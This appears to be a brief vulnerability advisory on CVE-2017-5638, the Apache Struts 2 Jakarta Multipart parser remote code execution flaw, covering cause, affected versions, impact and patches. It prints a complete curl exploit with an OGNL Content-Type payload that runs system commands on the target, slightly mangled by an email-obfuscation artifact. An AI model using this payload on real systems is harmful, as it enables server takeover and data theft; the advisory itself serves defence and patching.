Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request for file upload, the parser attempts to process it and fails. During this failure, the parser incorrectly interprets the header’s values as Object-Graph Navigation Language (OGNL) expressions. OGNL is a powerful expression language used by Struts for data binding and manipulation, allowing access to underlying Java objects and methods. An attacker can craft a Content-Type header containing a malicious OGNL expression. The flawed exception handler passes this tainted input directly to the OGNL interpreter without proper sanitization. Since the evaluation occurs with the application’s full privileges, the attacker can achieve remote code execution on the server, enabling them to run arbitrary system commands, exfiltrate data, or gain complete control of the affected host.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch released 2017-03-07
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-showcase/fileupload/doUpload.action`
How Exploit:
Craft malicious HTTP request with OGNL expression in Content-Type header. Exploit leverages parser’s exception handling to achieve code execution. Attackers can run arbitrary system commands on the server.
Protection from this CVE:
Immediate upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers. Disable the Jakarta Multipart parser if unused.
Impact:
Full server compromise. Arbitrary command execution. Sensitive data exposure. Complete system access for attackers.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
